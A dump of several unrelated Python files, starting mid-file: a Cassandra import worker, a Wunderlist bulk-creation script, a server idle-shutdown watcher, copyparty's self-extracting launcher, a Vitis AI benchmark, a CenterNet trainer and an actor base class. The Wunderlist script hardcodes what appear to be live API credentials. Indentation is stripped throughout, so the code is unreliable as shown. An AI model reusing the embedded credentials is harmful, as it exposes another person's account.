converted_rows = [_f for _f in [convert_row(r) for r in rows] if _f]
if errors:
for msg, rows in errors.items():
self.report_error(ParseError(msg), chunk, rows)
return converted_rows
def maybe_inject_failures(self, batch):
"""
Examine self.test_failures and see if the batch is a batch
supposed to cause a failure (failing_batch), or to terminate the worker process
(exit_batch), or not to be sent (unsent_batch).
@return any statement that will cause a failure or None if the statement should not be sent
plus a boolean indicating if a failure should be applied at all
"""
if 'failing_batch' in self.test_failures:
failing_batch = self.test_failures['failing_batch']
if failing_batch['id'] == batch['id']:
if batch['attempts'] < failing_batch['failures']:
statement = SimpleStatement("INSERT INTO badtable (a, b) VALUES (1, 2)",
consistency_level=self.consistency_level)
return statement, True # use this statement, which will cause an error
if 'exit_batch' in self.test_failures:
exit_batch = self.test_failures['exit_batch']
if exit_batch['id'] == batch['id']:
sys.exit(1)
if 'unsent_batch' in self.test_failures:
unsent_batch = self.test_failures['unsent_batch']
if unsent_batch['id'] == batch['id']:
return None, True # do not send this batch, which will cause missing acks in the parent process
return None, False # carry on as normal, do not apply any failures
@staticmethod
def make_batch(batch_id, rows, attempts=1):
return {'id': batch_id, 'rows': rows, 'attempts': attempts}
def split_into_batches(self, chunk, conv, tm):
"""
Batch rows by ring position or replica.
If there are at least min_batch_size rows for a ring position then split these rows into
groups of max_batch_size and send a batch for each group, using all replicas for this ring position.
Otherwise, we are forced to batch by replica, and here unfortunately we can only choose one replica to
guarantee common replicas across partition keys. We are typically able
to batch by ring position for small clusters or when VNODES are not used. For large clusters with VNODES
it may not be possible, in this case it helps to increase the CHUNK SIZE but up to a limit, otherwise
we may choke the cluster.
"""
rows_by_ring_pos = defaultdict(list)
errors = defaultdict(list)
min_batch_size = self.min_batch_size
max_batch_size = self.max_batch_size
ring = tm.ring
get_row_partition_key_values = conv.get_row_partition_key_values_fcn()
pk_to_token_value = tm.pk_to_token_value
get_ring_pos = tm.get_ring_pos
make_batch = self.make_batch
for row in chunk['rows']:
try:
pk = get_row_partition_key_values(row)
rows_by_ring_pos[get_ring_pos(ring, pk_to_token_value(pk))].append(row)
except Exception as e:
errors[e.message if hasattr(e, 'message') else str(e)].append(row)
if errors:
for msg, rows in errors.items():
self.report_error(ParseError(msg), chunk, rows)
replicas = tm.replicas
filter_replicas = tm.filter_replicas
rows_by_replica = defaultdict(list)
for ring_pos, rows in rows_by_ring_pos.items():
if len(rows) > min_batch_size:
for i in range(0, len(rows), max_batch_size):
yield filter_replicas(replicas[ring_pos]), make_batch(chunk['id'], rows[i:i + max_batch_size])
else:
# select only the first valid replica to guarantee more overlap or none at all
rows_by_replica[tuple(filter_replicas(replicas[ring_pos])[:1])].extend(rows) # TODO: revisit tuple wrapper
# Now send the batches by replica
for replicas, rows in rows_by_replica.items():
for i in range(0, len(rows), max_batch_size):
yield replicas, make_batch(chunk['id'], rows[i:i + max_batch_size])
def result_callback(self, _, batch, chunk):
self.update_chunk(batch['rows'], chunk)
def err_callback(self, response, batch, chunk, replicas):
if isinstance(response, OperationTimedOut) and chunk['imported'] == chunk['num_rows_sent']:
return # occasionally the driver sends false timeouts for rows already processed (PYTHON-652)
err_is_final = batch['attempts'] >= self.max_attempts
self.report_error(response, chunk, batch['rows'], batch['attempts'], err_is_final)
if not err_is_final:
batch['attempts'] += 1
statement = self.make_statement(self.query, self.conv, chunk, batch, replicas)
future = self.session.execute_async(statement)
future.add_callbacks(callback=self.result_callback, callback_args=(batch, chunk),
errback=self.err_callback, errback_args=(batch, chunk, replicas))
def report_error(self, err, chunk=None, rows=None, attempts=1, final=True):
if self.debug and sys.exc_info()[1] == err:
traceback.print_exc()
err_msg = err.message if hasattr(err, 'message') else str(err)
self.outmsg.send(ImportTaskError(err.__class__.__name__, err_msg, rows, attempts, final))
if final and chunk is not None:
self.update_chunk(rows, chunk)
def update_chunk(self, rows, chunk):
chunk['imported'] += len(rows)
if chunk['imported'] == chunk['num_rows_sent']:
self.outmsg.send(ImportProcessResult(chunk['num_rows_sent']))
class RateMeter(object):
def __init__(self, log_fcn, update_interval=0.25, log_file=''):
self.log_fcn = log_fcn # the function for logging, may be None to disable logging
self.update_interval = update_interval # how often we update in seconds
self.log_file = log_file # an optional file where to log statistics in addition to stdout
self.start_time = time.time() # the start time
self.last_checkpoint_time = self.start_time # last time we logged
self.current_rate = 0.0 # rows per second
self.current_record = 0 # number of records since we last updated
self.total_records = 0 # total number of records
if os.path.isfile(self.log_file):
os.unlink(self.log_file)
def increment(self, n=1):
self.current_record += n
self.maybe_update()
def maybe_update(self, sleep=False):
if self.current_record == 0:
return
new_checkpoint_time = time.time()
time_difference = new_checkpoint_time - self.last_checkpoint_time
if time_difference >= self.update_interval:
self.update(new_checkpoint_time)
self.log_message()
elif sleep:
remaining_time = time_difference - self.update_interval
if remaining_time > 0.000001:
time.sleep(remaining_time)
def update(self, new_checkpoint_time):
time_difference = new_checkpoint_time - self.last_checkpoint_time
if time_difference >= 1e-09:
self.current_rate = self.get_new_rate(self.current_record / time_difference)
self.last_checkpoint_time = new_checkpoint_time
self.total_records += self.current_record
self.current_record = 0
def get_new_rate(self, new_rate):
"""
return the rate of the last period: this is the new rate but
averaged with the last rate to smooth a bit
"""
if self.current_rate == 0.0:
return new_rate
else:
return (self.current_rate + new_rate) / 2.0
def get_avg_rate(self):
"""
return the average rate since we started measuring
"""
time_difference = time.time() - self.start_time
return self.total_records / time_difference if time_difference >= 1e-09 else 0
def log_message(self):
if not self.log_fcn:
return
output = 'Processed: %d rows; Rate: %7.0f rows/s; Avg. rate: %7.0f rows/s\r' % \
(self.total_records, self.current_rate, self.get_avg_rate())
self.log_fcn(output, eol='\r')
if self.log_file:
with open(self.log_file, "a") as f:
f.write(output + '\n')
def get_total_records(self):
self.update(time.time())
self.log_message()
return self.total_records
|
multi_list_creator.py
|
import threading
import time
import Queue
import random
class MultiThread(object):
def __init__(self, function, argsVector, maxThreads=10, queue_results=False):
self._function = function
self._lock = threading.Lock( )
self._nextArgs = iter(argsVector).next
self._threadPool = [ threading.Thread(target=self._doSome)
for i in range(maxThreads) ]
if queue_results:
self._queue = Queue.Queue( )
else:
self._queue = None
def _doSome(self):
while True:
self._lock.acquire( )
try:
try:
args = self._nextArgs( )
except StopIteration:
break
finally:
self._lock.release( )
result = self._function(args)
if self._queue is not None:
self._queue.put((args, result))
def get(self, *a, **kw):
if self._queue is not None:
return self._queue.get(*a, **kw)
else:
raise ValueError, 'Not queueing results'
def start(self):
for thread in self._threadPool:
time.sleep(0) # necessary to give other threads a chance to run
thread.start()
def join(self, timeout=None):
for thread in self._threadPool:
thread.join(timeout)
if __name__ == "__main__":
import wunderlist
wa = wunderlist.WunderlistAPI('94c0f1728a3cb4a066d21f1a63da3d4101fa7d11deb78ef800e4b16776e6', '171f61134bea341afeff')
def listcreate(n):
print 'N:', n
print wa.createlist('Maciek'+str(n))
def createtask(n):
print 'N:', n
print wa.createtask(247639416, 'Task'+str(n))
mt = MultiThread(createtask, range(1, 11))
mt.start( )
mt.join( )
print "Beautiful done."
|
shutdown_if_idle.py
|
# Copyright 2010 Alon Zakai ('kripken'). All rights reserved.
# This file is part of Syntensity/the Intensity Engine, an open source project. See COPYING.txt for licensing.
'''
Shuts down the server if no clients are in it, for a while.
Unlike shutdown_if_empty, we do not run until someone enters - if someone
does not enter soon after we load, we will shut down. Another difference is
that we do not immediately shut down after someone leaves, we wait a short
while.
'''
import os, signal, time, threading
from intensity.base import *
from intensity.server.persistence import Clients
def halt_on_excess():
print '<<< Idle, shutting down >>>'
time.sleep(1.0) # Let print and message propagate
os.kill(os.getpid(), signal.SIGKILL)
def watcher():
consecutives = 0
while True:
time.sleep(60.0)
if Clients.count() > 0:
consecutives = 0
else:
print '<<< Warning: Idling (%d) >>>' % consecutives
consecutives += 1
if consecutives == 3:
halt_on_excess()
thread = threading.Thread(target=watcher)
thread.setDaemon(True)
thread.start()
|
sfx.py
|
#!/usr/bin/env python3
# coding: latin-1
from __future__ import print_function, unicode_literals
import re, os, sys, time, shutil, signal, threading, tarfile, hashlib, platform, tempfile, traceback
import subprocess as sp
"""
to edit this file, use HxD or "vim -b"
(there is compressed stuff at the end)
run me with any version of python, i will unpack and run copyparty
there's zero binaries! just plaintext python scripts all the way down
so you can easily unpack the archive and inspect it for shady stuff
the archive data is attached after the b"\n# eof\n" archive marker,
b"\n#n" decodes to b"\n"
b"\n#r" decodes to b"\r"
b"\n# " decodes to b""
"""
# set by make-sfx.sh
VER = None
SIZE = None
CKSUM = None
STAMP = None
PY2 = sys.version_info[0] == 2
WINDOWS = sys.platform in ["win32", "msys"]
sys.dont_write_bytecode = True
me = os.path.abspath(os.path.realpath(__file__))
def eprint(*a, **ka):
ka["file"] = sys.stderr
print(*a, **ka)
def msg(*a, **ka):
if a:
a = ["[SFX]", a[0]] + list(a[1:])
eprint(*a, **ka)
# skip 1
def testptn1():
"""test: creates a test-pattern for encode()"""
import struct
buf = b""
for c in range(256):
buf += struct.pack("B", c)
yield buf
def testptn2():
import struct
for a in range(256):
if a % 16 == 0:
msg(a)
for b in range(256):
buf = b""
for c in range(256):
buf += struct.pack("BBBB", a, b, c, b)
yield buf
def testptn3():
with open("C:/Users/ed/Downloads/python-3.8.1-amd64.exe", "rb", 512 * 1024) as f:
while True:
buf = f.read(512 * 1024)
if not buf:
break
yield buf
testptn = testptn2
def testchk(cdata):
"""test: verifies that `data` yields testptn"""
import struct
cbuf = b""
mbuf = b""
checked = 0
t0 = time.time()
mdata = testptn()
while True:
if not mbuf:
try:
mbuf += next(mdata)
except:
break
if not cbuf:
try:
cbuf += next(cdata)
except:
expect = mbuf[:8]
expect = "".join(
" {:02x}".format(x)
for x in struct.unpack("B" * len(expect), expect)
)
raise Exception(
"truncated at {}, expected{}".format(checked + len(cbuf), expect)
)
ncmp = min(len(cbuf), len(mbuf))
# msg("checking {:x}H bytes, {:x}H ok so far".format(ncmp, checked))
for n in range(ncmp):
checked += 1
if cbuf[n] != mbuf[n]:
expect = mbuf[n : n + 8]
expect = "".join(
" {:02x}".format(x)
for x in struct.unpack("B" * len(expect), expect)
)
cc = struct.unpack(b"B", cbuf[n : n + 1])[0]
raise Exception(
"byte {:x}H bad, got {:02x}, expected{}".format(checked, cc, expect)
)
cbuf = cbuf[ncmp:]
mbuf = mbuf[ncmp:]
td = time.time() - t0
txt = "all {}d bytes OK in {:.3f} sec, {:.3f} MB/s".format(
checked, td, (checked / (1024 * 1024.0)) / td
)
msg(txt)
def encode(data, size, cksum, ver, ts):
"""creates a new sfx; `data` should yield bufs to attach"""
nin = 0
nout = 0
skip = False
with open(me, "rb") as fi:
unpk = ""
src = fi.read().replace(b"\r", b"").rstrip(b"\n").decode("utf-8")
for ln in src.split("\n"):
if ln.endswith("# skip 0"):
skip = False
continue
if ln.endswith("# skip 1") or skip:
skip = True
continue
if ln.strip().startswith("# fmt: "):
continue
unpk += ln + "\n"
for k, v in [
["VER", '"' + ver + '"'],
["SIZE", size],
["CKSUM", '"' + cksum + '"'],
["STAMP", ts],
]:
v1 = "\n{} = None\n".format(k)
v2 = "\n{} = {}\n".format(k, v)
unpk = unpk.replace(v1, v2)
unpk = unpk.replace("\n ", "\n\t")
for _ in range(16):
unpk = unpk.replace("\t ", "\t\t")
with open("sfx.out", "wb") as f:
f.write(unpk.encode("utf-8") + b"\n\n# eof\n# ")
for buf in data:
ebuf = buf.replace(b"\n", b"\n#n").replace(b"\r", b"\n#r")
f.write(ebuf)
nin += len(buf)
nout += len(ebuf)
msg("wrote {:x}H bytes ({:x}H after encode)".format(nin, nout))
def makesfx(tar_src, ver, ts):
sz = os.path.getsize(tar_src)
cksum = hashfile(tar_src)
encode(yieldfile(tar_src), sz, cksum, ver, ts)
# skip 0
def u8(gen):
try:
for s in gen:
yield s.decode("utf-8", "ignore")
except:
yield s
for s in gen:
yield s
def yieldfile(fn):
with open(fn, "rb") as f:
for block in iter(lambda: f.read(64 * 1024), b""):
yield block
def hashfile(fn):
h = hashlib.md5()
for block in yieldfile(fn):
h.update(block)
return h.hexdigest()
def unpack():
"""unpacks the tar yielded by `data`"""
name = "pe-copyparty"
tag = "v" + str(STAMP)
withpid = "{}.{}".format(name, os.getpid())
top = tempfile.gettempdir()
opj = os.path.join
final = opj(top, name)
mine = opj(top, withpid)
tar = opj(mine, "tar")
try:
if tag in os.listdir(final):
msg("found early")
return final
except:
pass
sz = 0
os.mkdir(mine)
with open(tar, "wb") as f:
for buf in get_payload():
sz += len(buf)
f.write(buf)
ck = hashfile(tar)
if ck != CKSUM:
t = "\n\nexpected {} ({} byte)\nobtained {} ({} byte)\nsfx corrupt"
raise Exception(t.format(CKSUM, SIZE, ck, sz))
with tarfile.open(tar, "r:bz2") as tf:
tf.extractall(mine)
os.remove(tar)
with open(opj(mine, tag), "wb") as f:
f.write(b"h\n")
try:
if tag in os.listdir(final):
msg("found late")
return final
except:
pass
try:
if os.path.islink(final):
os.remove(final)
else:
shutil.rmtree(final)
except:
pass
for fn in u8(os.listdir(top)):
if fn.startswith(name) and fn != withpid:
try:
old = opj(top, fn)
if time.time() - os.path.getmtime(old) > 86400:
shutil.rmtree(old)
except:
pass
try:
os.symlink(mine, final)
except:
try:
os.rename(mine, final)
return final
except:
msg("reloc fail,", mine)
return mine
def get_payload():
"""yields the binary data attached to script"""
with open(me, "rb") as f:
ptn = b"\n# eof\n# "
buf = b""
for n in range(64):
buf += f.read(4096)
ofs = buf.find(ptn)
if ofs >= 0:
break
if ofs < 0:
raise Exception("could not find archive marker")
# start at final b"\n"
fpos = ofs + len(ptn) - 3
f.seek(fpos)
dpos = 0
rem = b""
while True:
rbuf = f.read(1024 * 32)
if rbuf:
buf = rem + rbuf
ofs = buf.rfind(b"\n")
if len(buf) <= 4:
rem = buf
continue
if ofs >= len(buf) - 4:
rem = buf[ofs:]
buf = buf[:ofs]
else:
rem = b"\n# "
else:
buf = rem
fpos += len(buf) + 1
for a, b in [[b"\n# ", b""], [b"\n#r", b"\r"], [b"\n#n", b"\n"]]:
buf = buf.replace(a, b)
dpos += len(buf) - 1
yield buf
if not rbuf:
break
def utime(top):
i = 0
files = [os.path.join(dp, p) for dp, dd, df in os.walk(top) for p in dd + df]
while WINDOWS:
t = int(time.time())
if i:
msg("utime {}, {}".format(i, t))
for f in files:
os.utime(f, (t, t))
i += 1
time.sleep(78123)
def confirm(rv):
msg()
msg("retcode", rv if rv else traceback.format_exc())
msg("*** hit enter to exit ***")
try:
raw_input() if PY2 else input()
except:
pass
sys.exit(rv or 1)
def run(tmp, j2):
msg("jinja2:", j2 or "bundled")
msg("sfxdir:", tmp)
msg()
# block systemd-tmpfiles-clean.timer
try:
import fcntl
fd = os.open(tmp, os.O_RDONLY)
fcntl.flock(fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
except Exception as ex:
if not WINDOWS:
msg("\033[31mflock:{!r}\033[0m".format(ex))
t = threading.Thread(target=utime, args=(tmp,))
t.daemon = True
t.start()
ld = [tmp, os.path.join(tmp, "dep-j2")]
if j2:
del ld[-1]
if any([re.match(r"^-.*j[0-9]", x) for x in sys.argv]):
run_s(ld)
else:
run_i(ld)
def run_i(ld):
for x in ld:
sys.path.insert(0, x)
from copyparty.__main__ import main as p
p()
def run_s(ld):
# fmt: off
c = "import sys,runpy;" + "".join(['sys.path.insert(0,r"' + x + '");' for x in ld]) + 'runpy.run_module("copyparty",run_name="__main__")'
c = [str(x) for x in [sys.executable, "-c", c] + list(sys.argv[1:])]
# fmt: on
msg("\n", c, "\n")
p = sp.Popen(c)
def bye(*a):
p.send_signal(signal.SIGINT)
signal.signal(signal.SIGTERM, bye)
p.wait()
raise SystemExit(p.returncode)
def main():
sysver = str(sys.version).replace("\n", "\n" + " " * 18)
pktime = time.strftime("%Y-%m-%d, %H:%M:%S", time.gmtime(STAMP))
msg()
msg(" this is: copyparty", VER)
msg(" packed at:", pktime, "UTC,", STAMP)
msg("archive is:", me)
msg("python bin:", sys.executable)
msg("python ver:", platform.python_implementation(), sysver)
msg()
arg = ""
try:
arg = sys.argv[1]
except:
pass
# skip 1
if arg == "--sfx-testgen":
return encode(testptn(), 1, "x", "x", 1)
if arg == "--sfx-testchk":
return testchk(get_payload())
if arg == "--sfx-make":
tar, ver, ts = sys.argv[2:]
return makesfx(tar, ver, ts)
# skip 0
tmp = os.path.realpath(unpack())
try:
from jinja2 import __version__ as j2
except:
j2 = None
try:
run(tmp, j2)
except SystemExit as ex:
c = ex.code
if c not in [0, -15]:
confirm(ex.code)
except KeyboardInterrupt:
pass
except:
confirm(0)
if __name__ == "__main__":
main()
# skip 1
# python sfx.py --sfx-testgen && python test.py --sfx-testchk
# c:\Python27\python.exe sfx.py --sfx-testgen && c:\Python27\python.exe test.py --sfx-testchk
|
test_performance.py
|
# Copyright 2020 Xilinx Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ctypes import *
from typing import List
import cv2
import numpy as np
import xir
import vart
import os
import math
import threading
import time
import sys
'''
Calculate softmax
data: data to be calculated
size: data size
return: softamx result
'''
def CPUCalcSoftmax(data,size):
sum=0.0
result = [0 for i in range(size)]
for i in range(size):
result[i] = math.exp(data[i])
sum +=result[i]
for i in range(size):
result[i] /=sum
return result
def get_script_directory():
path = os.getcwd()
return path
global threadnum
#def runRfClassify(dpu,rfIn,rfClass,rfSnr,cnt):
def runRfClassify(dpu,rfIn, cnt):
"""get tensor"""
inputTensors = dpu.get_input_tensors()
outputTensors = dpu.get_output_tensors()
outputHeight = outputTensors[0].dims[1]
outputWidth = outputTensors[0].dims[2]
outputChannel = outputTensors[0].dims[3]
outputSize = outputHeight*outputWidth*outputChannel
softmax = np.empty(outputSize)
batchSize = inputTensors[0].dims[0]
n_of_samples = len(rfIn)
count = 0;
top1_count = 0
mods = [
'OOK', '4ASK', '8ASK', 'BPSK', 'QPSK', '8PSK',
'16PSK', '32PSK', '16APSK', '32APSK', '64APSK', '128APSK',
'16QAM', '32QAM', '64QAM', '128QAM', '256QAM', 'AM-SSB-WC',
'AM-SSB-SC','AM-DSB-WC', 'AM-DSB-SC', 'FM', 'GMSK', 'OQPSK']
while count < cnt:
runSize = batchSize
shapeIn = (runSize,) + tuple([inputTensors[0].dims[i] for i in range(inputTensors[0].ndim)][1:])
"""prepare batch input/output """
outputData = []
inputData = []
outputData.append(np.empty((runSize,outputHeight,outputWidth,outputChannel), dtype = np.float32, order = 'C'))
inputData.append(np.empty((shapeIn), dtype = np.float32, order = 'C'))
"""init input image to input buffer """
for j in range(runSize):
imageRun = inputData[0]
imageRun[j,...] = rfIn[(count+j)% n_of_samples].reshape(inputTensors[0].dims[1],inputTensors[0].dims[2],inputTensors[0].dims[3])
"""run with batch """
job_id = dpu.execute_async(inputData,outputData)
dpu.wait(job_id)
for j in range(len(outputData)):
outputData[j] = outputData[j].reshape(runSize, outputSize)
"""softmax calculate with batch """
"""Benchmark DPU FPS performance over Vitis AI APIs execute_async() and wait() """
"""Uncomment the following code snippet to include softmax calculation for model’s end-to-end FPS evaluation """
for j in range(runSize):
softmax = CPUCalcSoftmax(outputData[0][j], outputSize)
top1 = mods[np.argmax(softmax)]
count = count + runSize
"""
obtain dpu subgrah
"""
def get_child_subgraph_dpu(graph: "Graph") -> List["Subgraph"]:
assert graph is not None, "'graph' should not be None."
root_subgraph = graph.get_root_subgraph()
assert (
root_subgraph is not None
), "Failed to get root subgraph of input Graph object."
if root_subgraph.is_leaf:
return []
child_subgraphs = root_subgraph.toposort_child_subgraph()
assert child_subgraphs is not None and len(child_subgraphs) > 0
return [
cs
for cs in child_subgraphs
if cs.has_attr("device") and cs.get_attr("device").upper() == "DPU"
]
def main(argv):
global threadnum
threadAll = []
threadnum = int(argv[1])
i = 0
g = xir.Graph.deserialize(argv[2])
subgraphs = get_child_subgraph_dpu(g)
cnt = int(argv[3])
assert len(subgraphs) == 1 # only one DPU kernel
all_dpu_runners = []
for i in range(int(threadnum)):
all_dpu_runners.append(vart.Runner.create_runner(subgraphs[0], "run"))
"""input files"""
rfIn=np.load('./rf_input.npy')
rfIn = rfIn[0:cnt,:,:]
print("Number of RF Samples is ",(cnt*threadnum))
"""
The cnt variable is used to control the number of times a single-thread DPU runs.
Users can modify the value according to actual needs. It is not recommended to use
too small number when there are few input images, for example:
1. If users can only provide very few images, e.g. only 1 image, they should set
a relatively large number such as 360 to measure the average performance;
2. If users provide a huge dataset, e.g. 50000 images in the directory, they can
use the variable to control the test time, and no need to run the whole dataset.
"""
"""run with batch """
time_start = time.time()
for i in range(int(threadnum)):
t1 = threading.Thread(target=runRfClassify, args=(all_dpu_runners[i], rfIn, cnt))
threadAll.append(t1)
for x in threadAll:
x.start()
for x in threadAll:
x.join()
del all_dpu_runners
time_end = time.time()
timetotal = time_end - time_start
total_frames = cnt * int(threadnum)
fps = float(total_frames / timetotal)
print("FPS=%.2f, total RF frames = %.2f , time=%.6f seconds" %(fps,total_frames, timetotal))
if __name__ == "__main__":
if len(sys.argv) != 4:
print("usage : python3 test_performance.py <thread_number> <xmodel_file> <number of Rf Frames>")
else:
main(sys.argv)
|
train.py
|
#!/usr/bin/env python
import os
import json
import torch
import numpy as np
import queue
import pprint
import random
import argparse
import importlib
import threading
import traceback
from tqdm import tqdm
from utils import stdout_to_tqdm
from config import system_configs
from nnet.py_factory import NetworkFactory
from torch.multiprocessing import Process, Queue, Pool
from db.datasets import datasets
from tensorboardX import SummaryWriter
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
def parse_args():
parser = argparse.ArgumentParser(description="Train CenterNet")
parser.add_argument("cfg_file", help="config file", type=str)
parser.add_argument("--iter", dest="start_iter",
help="train at iteration i",
default=0, type=int)
parser.add_argument("--threads", dest="threads", default=4, type=int)
#args = parser.parse_args()
args, unparsed = parser.parse_known_args()
return args
def prefetch_data(db, queue, sample_data, data_aug):
ind = 0
print("start prefetching data...")
np.random.seed(os.getpid())
while True:
try:
data, ind = sample_data(db, ind, data_aug=data_aug)
queue.put(data)
except Exception as e:
traceback.print_exc()
raise e
def pin_memory(data_queue, pinned_data_queue, sema):
while True:
data = data_queue.get()
data["xs"] = [x.pin_memory() for x in data["xs"]]
data["ys"] = [y.pin_memory() for y in data["ys"]]
pinned_data_queue.put(data)
if sema.acquire(blocking=False):
return
def init_parallel_jobs(dbs, queue, fn, data_aug):
tasks = [Process(target=prefetch_data, args=(db, queue, fn, data_aug)) for db in dbs]
for task in tasks:
task.daemon = True
task.start()
return tasks
def train(training_dbs, validation_db, start_iter=0):
learning_rate = system_configs.learning_rate
max_iteration = system_configs.max_iter
pretrained_model = system_configs.pretrain
snapshot = system_configs.snapshot
val_iter = system_configs.val_iter
display = system_configs.display
decay_rate = system_configs.decay_rate
stepsize = system_configs.stepsize
writer = SummaryWriter(max_queue=5)
# getting the size of each database
training_size = len(training_dbs[0].db_inds)
validation_size = len(validation_db.db_inds)
# queues storing data for training
training_queue = Queue(system_configs.prefetch_size)
validation_queue = Queue(5)
# queues storing pinned data for training
pinned_training_queue = queue.Queue(system_configs.prefetch_size)
pinned_validation_queue = queue.Queue(5)
# load data sampling function
data_file = "sample.{}".format(training_dbs[0].data)
sample_data = importlib.import_module(data_file).sample_data
# allocating resources for parallel reading
training_tasks = init_parallel_jobs(training_dbs, training_queue, sample_data, True)
if val_iter:
validation_tasks = init_parallel_jobs([validation_db], validation_queue, sample_data, False)
training_pin_semaphore = threading.Semaphore()
validation_pin_semaphore = threading.Semaphore()
training_pin_semaphore.acquire()
validation_pin_semaphore.acquire()
training_pin_args = (training_queue, pinned_training_queue, training_pin_semaphore)
training_pin_thread = threading.Thread(target=pin_memory, args=training_pin_args)
training_pin_thread.daemon = True
training_pin_thread.start()
validation_pin_args = (validation_queue, pinned_validation_queue, validation_pin_semaphore)
validation_pin_thread = threading.Thread(target=pin_memory, args=validation_pin_args)
validation_pin_thread.daemon = True
validation_pin_thread.start()
print("building model...")
nnet = NetworkFactory(training_dbs[0])
if pretrained_model is not None:
if not os.path.exists(pretrained_model):
raise ValueError("pretrained model does not exist")
print("loading from pretrained model")
nnet.load_pretrained_params(pretrained_model)
if start_iter:
learning_rate /= (decay_rate ** (start_iter // stepsize))
nnet.load_params(start_iter)
nnet.set_lr(learning_rate)
print("training starts from iteration {} with learning_rate {}".format(start_iter + 1, learning_rate))
else:
nnet.set_lr(learning_rate)
print("training start...")
nnet.cuda()
nnet.train_mode()
with stdout_to_tqdm() as save_stdout:
for iteration in tqdm(range(start_iter + 1, max_iteration + 1), file=save_stdout, ncols=80):
training = pinned_training_queue.get(block=True)
training_loss, focal_loss, pull_loss, push_loss, regr_loss = nnet.train(**training)
#training_loss, focal_loss, pull_loss, push_loss, regr_loss, cls_loss = nnet.train(**training)
if display and iteration % display == 0:
print("training loss at iteration {}: {}".format(iteration, training_loss.item()))
print("focal loss at iteration {}: {}".format(iteration, focal_loss.item()))
print("pull loss at iteration {}: {}".format(iteration, pull_loss.item()))
print("push loss at iteration {}: {}".format(iteration, push_loss.item()))
print("regr loss at iteration {}: {}".format(iteration, regr_loss.item()))
#print("cls loss at iteration {}: {}\n".format(iteration, cls_loss.item()))
writer.add_scalar('training_loss', training_loss.item(), iteration)
writer.add_scalar('focal_loss', focal_loss.item(), iteration)
writer.add_scalar('pull_loss', pull_loss.item(), iteration)
writer.add_scalar('push_loss', push_loss.item(), iteration)
writer.add_scalar('regr_loss', regr_loss.item(), iteration)
del training_loss, focal_loss, pull_loss, push_loss, regr_loss#, cls_loss
if val_iter and validation_db.db_inds.size and iteration % val_iter == 0:
nnet.eval_mode()
validation = pinned_validation_queue.get(block=True)
validation_loss = nnet.validate(**validation)
print("validation loss at iteration {}: {}".format(iteration, validation_loss.item()))
writer.add_scalar('validation_loss', validation_loss.item(), iteration)
nnet.train_mode()
if iteration % snapshot == 0:
nnet.save_params(iteration)
if iteration % stepsize == 0:
learning_rate /= decay_rate
nnet.set_lr(learning_rate)
# sending signal to kill the thread
training_pin_semaphore.release()
validation_pin_semaphore.release()
# terminating data fetching processes
for training_task in training_tasks:
training_task.terminate()
for validation_task in validation_tasks:
validation_task.terminate()
if __name__ == "__main__":
args = parse_args()
cfg_file = os.path.join(system_configs.config_dir, args.cfg_file + ".json")
with open(cfg_file, "r") as f:
configs = json.load(f)
configs["system"]["snapshot_name"] = args.cfg_file
system_configs.update_config(configs["system"])
train_split = system_configs.train_split
val_split = system_configs.val_split
print("loading all datasets...")
dataset = system_configs.dataset
# threads = max(torch.cuda.device_count() * 2, 4)
threads = args.threads
print("using {} threads".format(threads))
training_dbs = [datasets[dataset](configs["db"], train_split) for _ in range(threads)]
validation_db = datasets[dataset](configs["db"], val_split)
print("system config...")
pprint.pprint(system_configs.full)
print("db config...")
pprint.pprint(training_dbs[0].configs)
print("len of db: {}".format(len(training_dbs[0].db_inds)))
train(training_dbs, validation_db, args.start_iter)
|
__init__.py
|
import itertools
import uuid
from abc import ABC, abstractmethod
from multiprocessing import Process, Queue
from typing import (
Any, Hashable, MutableMapping, MutableSequence, NoReturn, Optional
)
from ..messages import Message, MessageKind
class BaseActor(ABC):
"""An actor as defined in the actor-based model of computing.
Attributes:
name: A hashable otherwise that identifies the actor.
inbox: A buffer that stores messages received from other actors.
outbox: A mapping from actor names to their inboxes.
"""
__slots__ = ('name', 'inbox', 'outbox')
def __init__(
self,
name: Optional[Hashable] = None,
inbox: Optional[Any] = None):
super().__init__()
self.name = self._else(name, str(uuid.uuid4().time_low))
self.inbox = self._else(inbox, Queue())
self.outbox = {}
@staticmethod
def _else(optional, otherwise):
return optional if optional is not None else otherwise
@abstractmethod
def on_next(self, msg: Any) -> NoReturn:
"""Processes a message."""
pass
@abstractmethod
def should_stop(self) -> bool:
"""Returns True if the actor should terminate."""
pass
def run(self) -> Any:
"""Initiates the actor."""
stop, receive, on_next = self.should_stop, self.receive, self.on_next
while not stop():
on_next(receive())
@abstractmethod
def send(self, *msgs: Any) -> NoReturn:
"""Sends messages to other actors."""
pass
def receive(self) -> Any:
"""Receives a message from another actor."""
return self.inbox.get(block=True)
def connect(self, *actors: 'BaseActor') -> NoReturn:
"""Enables this actor to send messages to other actors."""
self.outbox.update((a.name, a.inbox) for a in actors)
def disconnect(self, *actors: 'BaseActor') -> NoReturn:
"""Disables this actor from sending messages to other actors."""
pop = self.outbox.pop
for a in actors:
pop(a.name, None)
def __repr__(self):
return f'{self.__class__.__name__}(name={self.name})'
class MessageActor(BaseActor):
"""An base actor with default logic for handling messages.
Attributes:
attrs: A mapping to maintain any mutable state.
"""
_EMPTY_ARGS = ()
_EMPTY_KWARGS = {}
__slots__ = ('attrs',)
def __init__(self, name: Optional[Hashable] = None):
super().__init__(name)
self.attrs: MutableMapping[Hashable, Any] = {}
def on_next(self, msg: Message) -> NoReturn:
"""Processes a message."""
pass
def should_stop(self) -> bool:
"""Returns True if the actor should terminate."""
pass
def run(self) -> NoReturn:
"""Initiates the actor."""
while not self.should_stop():
msg = self.receive()
if self.should_ignore(msg):
pass
elif msg.kind == MessageKind.DEFAULT:
self.on_next(msg)
elif msg.kind == MessageKind.CALL:
self.handle_call(msg)
elif msg.kind == MessageKind.RETURN:
self.handle_return(msg)
elif msg.kind == MessageKind.ACK:
self.handle_ack(msg)
elif msg.kind == MessageKind.SET:
self.handle_set(msg)
def handle_call(self, msg: Message) -> NoReturn:
"""Handle CALL Message."""
# Prepare method call and get return otherwise
data = msg.data
method = self.attrs[data['name']]
